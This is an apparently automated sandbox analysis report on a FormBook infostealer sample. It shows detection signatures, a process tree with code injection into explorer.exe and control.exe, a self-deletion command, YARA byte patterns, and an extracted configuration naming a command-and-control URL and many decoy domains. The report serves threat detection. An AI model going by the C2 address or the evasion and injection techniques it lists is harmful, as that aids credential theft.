Play interactive tour

Edit tour

Analysis Report 2435.bat

Overview

General Information

Sample Name:	2435.bat (renamed file extension from bat to exe)
Analysis ID:	433173
MD5:	862b4c2abad2c07ac13d5e051c18ab86
SHA1:	c78f0a59312c7902e445c5a31d4896907e96475c
SHA256:	c347c2d7579053d263f6ab6eddca7bd03691ebab93b30b5caba462caa7106beb
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

2435.exe (PID: 6304 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)

2435.exe (PID: 6340 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)

explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

control.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)

cmd.exe (PID: 3584 cmdline: /c del 'C:\Users\user\Desktop\2435.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x2171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x2787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x28ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x13ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x8327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x932a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5409:$sqlite3step: 68 34 1C 7B E1 0x551c:$sqlite3step: 68 34 1C 7B E1 0x5438:$sqlite3text: 68 38 2A 90 C5 0x555d:$sqlite3text: 68 38 2A 90 C5 0x544b:$sqlite3blob: 68 53 D8 7F 8C 0x5573:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.2435.exe.24d0000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.2435.exe.24d0000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.2435.exe.24d0000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.2.2435.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.2435.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.2435.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.1.2435.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.1.2435.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.2435.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
1.2.2435.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.2435.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.2435.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
0.2.2435.exe.24d0000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.2435.exe.24d0000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.2435.exe.24d0000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
1.1.2435.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.1.2435.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.2435.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 2435.exe

ReversingLabs: Detection: 43%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: 2435.exe

Joe Sandbox ML: detected

Source: 1.1.2435.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.2435.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.2435.exe.24d0000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.control.exe.4d7f834.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.control.exe.43b090.1.unpack	Avira: Label: TR/Patched.Ren.Gen

Source: 2435.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wntdll.pdbUGP source: 2435.exe, 00000000.00000003.228355721.0000000009B60000.00000004.00000001.sdmp, 2435.exe, 00000001.00000002.288517092.0000000000B6F000.00000040.00000001.sdmp, control.exe, 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp
Source:	Binary string: control.pdb source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: 2435.exe, control.exe
